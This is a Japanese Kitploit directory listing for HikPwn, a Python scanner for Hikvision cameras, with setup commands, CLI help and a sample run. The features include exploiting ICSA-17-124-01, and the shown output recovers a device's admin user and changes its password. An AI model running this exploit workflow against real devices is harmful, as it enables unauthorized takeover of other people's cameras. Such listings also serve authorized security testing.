Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
HikPwn — HikPwnは、Python 3.8で書かれた、基本的な脆弱性スキャン機能を持つHikvisionデバイス向けのシンプルなスキャナーです。 | Kitploit
ツール/GitHubGitHub/4n4nk3/hikpwn
脆弱性スキャナーIoTセキュリティネットワークマッピングエクスプロイト情報収集
GitHub4n4nk3/hikpwn

HikPwn

HikPwnは、Python 3.8で書かれた、基本的な脆弱性スキャン機能を持つHikvisionデバイス向けのシンプルなスキャナーです。

リポジトリを見る
127344年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

HikPwn

HikPwnは、Python 3.8で書かれたHikvisionデバイス向けのシンプルなスキャナーで、基本的な脆弱性スキャン機能を備えています。 このプロジェクトは、Hikvisionのソフトウェアやデバイスが生成するネットワークトラフィックをキャプチャして観察している最中の好奇心から生まれました。

セットアップ手順:

root@kitploit:~
git clone https://github.com/4n4nk3/HikPwn.git
cd HikPwn
pip install -r requirements.txt

テスト済み環境:

  • Linux 4.19 x86_64上のPython 3.8

機能と特徴:

  • Hikvisionデバイスのパッシブ検出。
  • UDP UPNPプロービングによるHikvisionデバイスのアクティブ検出と列挙。
  • ICSA-17-124-01の検出と悪用機能(管理者レベルのアクセスを取得)。
  • 列挙したデータを'./log.txt'に保存。

作業中です... お楽しみに!

TODO:

  • 検出をスキップし、指定したIPのみをICSA-17-124-01用にスキャンするオプションを追加。
  • より多くのデバイスでのテスト。
  • CVE-2021-36260の検出と悪用機能を追加。

ヘルプ:

root@kitploit:~
usage: hikpwn.py [-h] --interface INTERFACE --address ADDRESS [--active]  [--ICSA_17_124_01]

HikPwn, a simple scanner for Hikvision devices with basic vulnerability scanning capabilities written in Python 3.8. by Ananke: https://github.com/4n4nk3.

optional arguments:
  -h, --help            show this help message and exit
  --interface INTERFACE the network interface to use
  --address ADDRESS     the ip address of the selected network interface
  --active              enable "active" discovery
  --ICSA_17_124_01      enable ICSA-17-124-01 detection on discovered devices

検閲済みプレビュー:

root@kitploit:~
Using eth0 as network interface and XXX.XXX.XXX.XXX as its IP address...

[*] Started 30 seconds of both passive and active discovery...

================================================================================
[*] Total detected devices: 1

	XXX.XXX.XXX.XX

================================================================================
[*] Active discovery's results:

DEVICE #1:
	LABEL                     DATA      
	--------------------------------------------------
	Serial Number             xxxxxxxxxxxxxxxxxxxxx
	Description               DS-2DE4220IW-D
	MAC                       XX:XX:XX:XX:XX:XX
	IP                        XXX.XXX.XXX.XX
	DHCP in use               false     
	Software Version          V5.4.3build 160810
	DSP Version               V7.3 build 160801
	Boot Time                 2019-03-01 00:05:33
	Activation Status         true      
	Password Reset Ability    true      


================================================================================
[*] Passive discovery's results:

DEVICE #1:
	Detected a device with ip address XXX.XXX.XXX.XX and MAC address XX:XX:XX:XX:XX:XX.


================================================================================
[*] Starting scan for ICSA-17-124-01...

Checking if XXX.XXX.XXX.XX is vulnerable to ICSA-17-124-01 and if we can get a list of valid users present on the device...
XXX.XXX.XXX.XX is vulnerable to ICSA_17_124_01. Recovered user list:
    user_id                   1
    user_name                 admin
    priority                  high
    user_level                Administrator

Do you want to exploit the vulnerability and try to change admin's password? (y/n)
    >>> y

Enter a password composed by numbers and letters (8-12 characters):
    >>> 

Password change successful.

このプロジェクトは教育目的のみです。違法行為に使用しないでください。当方は違法または非倫理的な行動を支持または容認せず、本ソフトウェアの誤用による責任を負いかねます。

ツールをダウンロード